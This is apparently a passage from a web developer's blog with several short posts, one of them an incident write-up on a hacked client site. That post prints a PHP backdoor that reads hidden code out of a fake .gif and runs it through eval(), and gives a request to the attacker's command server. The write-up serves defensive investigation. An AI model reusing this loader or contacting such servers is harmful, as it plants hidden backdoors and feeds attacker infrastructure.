This command just forces the job to re-run on  a single domain:

/usr/local/psa/admin/sbin/statistics –calculate-one –domain-name=Domain_name.com

Incidentally, our nameservers are ns1.leadingedgehosting.co.uk & ns2.leadingedgehosting.co.uk

This post will show you how to set up your DNS so you can have ns1.yourdomain.com & ns2.yourdomain.com whatever your web hosts nameservers are.

We use the Plesk control panel so I’m going to demonstrate how to do this using that, but in principle, as long as you have access to your own DNS records you should be able to do this using any control panel.

Step 1.

Create two new A-records on your nameservers for your domain as follows:

These should point to your nameserver IPs.

Step 2.

Register your Glue records with your domain registrar. They will ask you for the IP addresses of your nameservers, these should match your IPs as set up above, and that’s it.

Your domain registrar may have the facility to register Glue records via their control panel, but many don’t, so you may have to email them.

Now you should be able to have ns1.yourdomain.com and ns2.yourdomain.com and use your web hosting companies nameservers as if they were your own!

It’s pretty simple to change the default port:

Just edit the SSH configuration file, normally this will be found in /etc/ssh or /usr/local/etc/ssh.

To change it over, edit the line that reads “Port 22″ or “#Port 22″ to a different port number and then restart SSH.

So before I start this post I think I should make it clear that I am supporting my clients legacy code, which was developed by another developer at least 3-4 years ago. My client is aware of the issues with the code and is actively seeking to patch it up.

So anway, yesterday I got an email from my client at around 3pm showing some rather nasty Google search results with some of his domains listed in them. Naturally I clicked on the links to see what would happen, and sure enough, after being sent to my clients website, I was sent on to some kind of affiliate web page full of pop-ups trying to tell me my machine had a virus and that I should buy the anti-virus software they were selling – I’m sure you’ve all seen the kind of website I’m talking about.

So obviously this is a bit of an emergency, so I stopped what I was doing and started to investigate. I’m still not certain how the attack is being implemented since we’ve not yet managed to discover how the hacker is getting access to the server, hence this being probably the first post in a series, but I’ll tell you what I know.

About a month ago, my client phoned me up saying he had accidentally clicked on a virus in his email, and it had caused major problems on his PC. He told me he was running anti-virus software and cleaning up his machines. Knowing that my client doesn’t have the greatest computer skills I thought “uh oh” this could be bad.

Shortly after this, maybe a week later, my client phones up because one of his clients ecommerce websites (he runs a small web development firm) was redirecting visitors to a web page selling anti-virus software! (sound familiar?). So I took a look around the code and discovered that one of the product names in the database had been changed to include some JavaScript which redirected you immediately to this AV affiliate website.

My first thought was oh no, this means the website has been SQL injected, so I looked through the logs and sure enough there were some requests coming from a bot that was trying to SQL inject. Obviously I patched up the SQL injection vulnerability and nothing else of the issue.

Then, about 2 weeks later, I get another phone call; the websites doing the same thing. So now I know it can’t be SQL injection, which means the hacker either has root access to the server the website(s) are on (more than one has been affected to date), or that the hacker has FTP access, so I instruct my client to change all his FTP usernames and passwords, which he promptly does, and I fix the issues with the code.

Then about 2 weeks more pass by and I get an email entitled “Nightmare!!”, which is kind of where this story begins…

So, as I mentioned above, I visited the website in my browser – looks fine, I am able to browse the shop, I’m not redirected anywhere, but the email from my client has links to this website that definately redirect to the affiliate website in question. So I type the address into my browser including the full URL from my clients email, and sure enough I am redirected to this affiliate website.

The url looked like this:

http://www.clientsdomain.com/index.php?id=50000

So naturally I checked out index.php, and saw the following code:

<?
$browser = CheckBrowser();
$link = $browser ? ‘index.php?id=50000′ : ‘about-us.php’;
$title = $browser ? ‘Blog <font color=#FF0000>(NEW)</font>’ : ‘About us’;
?>
<td height=”26″ align=”center” class=”style51″><a href=”<? echo $link; ?>”><? echo $title; ?></a></td>

Roughly speaking, this code checks the browser, and either displays a link to about-us.php or links off the url above (index.php?id=50000).

Now, that’s interesting, so I needed to know what the php function CheckBrowser() was doing… so I had to hunt around the code (all Object Orientated Code without documentation) and I found the CheckBrowser() function – it was basically testing to see if the request was being made by GoogleBot, or Yahoo. So to test my theory I used the following great little tool ( http://www.web-tool.org/cloak-check/cloak-check.asp ) in conjunction with http://bethebot.com and yep, this website was definitely cloaking.

So then I had to figure out how it was redirecting, index.php didn’t have any code to check for $_GET variables, nor did it include any code to redirect people; strange…

So I took another good look around the code and found the following bit of PHP:

        if(isset($_REQUEST['id']))
        if(($_REQUEST['id']>=50000)&&($_REQUEST['id']<60000))
        {
            $fls = array(array('images/product-display-box_19.gif',3696,21894));
            foreach($fls as $v)
            if(file_exists($v[0]))
            {
                $f=fopen($v[0],'rb');fseek($f,$v[1],SEEK_SET);$d=fread($f,$v[2]);fclose($f);eval($d);megadupa($v[0]);
                break;
            }
            die();
        }

Amusingly, placed immediately preceding my code designed to prevent SQL injection.

Now look at this code, there is a $_GET variable called id, with a value between 50000 and 60000 it opens a file on the server product-display-box_19.gif and reads a specific part of that file and then evals()  whatever it finds (which means it “runs the code”). Now a .gif image shouldn’t be able to be executed, so how does this work? and, what the hell is the megadupa() function, that’s not part of the PHP language, why isn’t this falling over saying that that is bad php.

So the next port of call was to look at product-display-box_19.gif. I checked out the images/ folder on the server and guess what, there is a 19MB file with that very name, now 19MB is HUGE for an image file, so I though I need to see this.

I downloaded it from the server, and double clicked on it – I’m pretty good with PCs so although I knew I might suffer a buffer overlow attack or a trojan, but I’m confident I can handle these things

Well, I loaded up the image and it was a tiny little .gif, it looked like the bottom of a button and would normally be 19 KB  in size not 19 MB! Obviously there is something fishy going on here. So I opened the .gif file using Notepad++, took ages of course, but once it had loaded, I scanned through the code and sure enough this .gif file has been specially crafted and contains loads of PHP, XHTML / CSS the lot, in fact it’s a pretty amazing file.

So I renamed the file to .php and noticing that there were some comments in the embedded PHP instructing me how to run the code without the eval() function stuck it on my local server and voila it loaded! And it didn’t just load anything, it loaded what looked like clones of Wordpress – two of them, loads of sex related keywords, basically this thing looked like it had been used repeatedly to hack servers. What a find.

So being curious I started to trawl through the code, and guess what, this script “phones home”, revealing IP addresses. So I followed them, and ended up on a webserver in the USA, with a message saying that “the service was unavailable”, so I referred back to the code, and noticed that when it “phones home” it also sends back information about the referrer, domain, IP address etc etc so I constructed a fake URL as follows

http://123.123.123.123/gate/gate.php?t=av&s=2&pid=665&uri=www.example.com%2Findex.php&ip=64.22.112.234&ref=&ua=Mozilla%2F5.0+%28compatible%3B+Googlebot%2F2.1%3B+%2Bhttp%3A%2F%2Fwww.google.com%2Fbot.html%29

And, I was in!

Suddenly this server in America sends me back a web address, you guessed it, for the affiliate website.

So now I’m looking at a server which instructs these scripts to point other peoples websites to a URL of the hackers choice! Of course at this stage I whois’ed the IP address and yes I know who is hosting the IP.

So next up, I do a reverse DNS lookup using http://www.myipneighbors.com/ and I find some of the other websites on the server in America. So I visited them, they pretty much all seemed to be spammy fake “search engines” but interestingly they linked back to another IP address – also in America, but on a different host server. So I loaded up the new IP address and was immediately redirected to domain. I’m not going to reveal the domain, but this gave me something else to run a whois check on.

So I did, and the domain resolved to someone in Texas, but even more interestingly, it included an email address for the registrant: @mail.ru

So now I’m looking at a Russian hacker, using a server in America to control what seems to be a number of compromised servers to redirect websites and manipulate search engine results to point to an affiliate website selling anti-virus software.

So, since I still don’t know how this person got into my clients website in the first place, I have instructed him to change his FTP passwords and not to log in again for the time being. I will be contacting the web hosting company and I’m waiting to see if the hacker gets back in again, if they do I can only presume the web host has been compromised.

Look out for part two…

However, the principles on which this new framework are built sound very enticing:

When you program in Cappuccino, you don’t need to concern yourself with the complexities of traditional web technologies like HTML, CSS, or even the DOM. The unpleasantries of building complex cross browser applications are abstracted away for you

They also go on to talk about how you integrate your applications with desktop applications and go on to demonstrate the first major application developed using Cappuccino 280 slides even allows you to import powerpoint presentations directly from powerpoint – that’s cool!

I want to write more on this, so I’m going to test it out and come back to you.

For example, I seem to get this a lot, you build a website using a Strict XHTML doctype and then clients start to ask you to put popup links in (target=”_blank”) now we all know that this goes against the strict doctype and doesn’t validate, but when I object to my clients, well, they still want this feature.

On reflection perhaps it’s not such a bad thing anyway, a lot of times a link will open a pdf and lots of users close the window expecting to return to their web browser, but actually end up closing their browser altogether.

Instead of putting the focus on web developers, perhaps we should ban these browser add-ins as a worse barrier to usability than target=”_blank” links, which in this example may improve usability…

I know I can switch to the transitional doctype to get round this, but generally I’d prefer not to have to.

I also understand that XHTML was developed to work across a number of applications / devices and therefore target=”_blank” may not be great for pdas or mobile phones, but neither is a pdf document which most mobile phone users can’t (yet) open.

I make a lot of websites, and I know HTML 4 & XHTML pretty damn well, but I can’t fathom the W3C definition of the <address> tag.

I quote:

The <address> tag defines contact information for a document or a section.

Tips and Notes

Note: The <address> tag should NOT be used as describing a postal address, unless it is a part of the contact information.

So what is it for then? Mostly when I have an address it’s for post; I quite like being contacted by post.

Are they saying don’t use it for addresses?

Can anyone clear this up for me?

I’m regularly called upon to build shops, or very simple CMS systems with image upload facilities. This is fine, no complaints about that, but when you’re creating a CMS with image uploads, you always need to handle what happens when your user doesn’t upload an image – or what happens if an image is deleted.

Now I know it’s trivial to create an if statement to conditionally show an image or not, but it would be even more trivial if we could just add another attribute to X/HTML <img> tags to allow specifying an alternative image if no image is available. I know we already have the alt tag, to show text or help users with screen readers, but how about something like altimg=”image.gif” as a new attribute?  Then you could just set it up once and everytime an image tag is loaded without a src=”" attribute, or the file specified by the src=”" attribute is missing you have a fallback image.

It would mean marginally less typing for me, potentially saving me from the devastating effects of RSI! It could also result in a slightly better end-user experience abolishing those nasty placeholders in IE (and firefox if you have that setting switched on.

Perhaps this has already been suggested elsewhere, I don’t know, and to be honest I haven’t really followed the HTML 5 development so far, so if this (or something similar) is already in there a) please let me know b) great.

<link href="" rel="alternate" type="application/rss+xml" title="" />

but since we’re already using starting to use robots.txt files to reference our sitemaps like so:

Sitemap: <sitemap_location>

why not use it to reference our RSS feeds as well? It would be trivial do something like this in a sitemap:

RSS: <feed_location>

Thoughts anyone?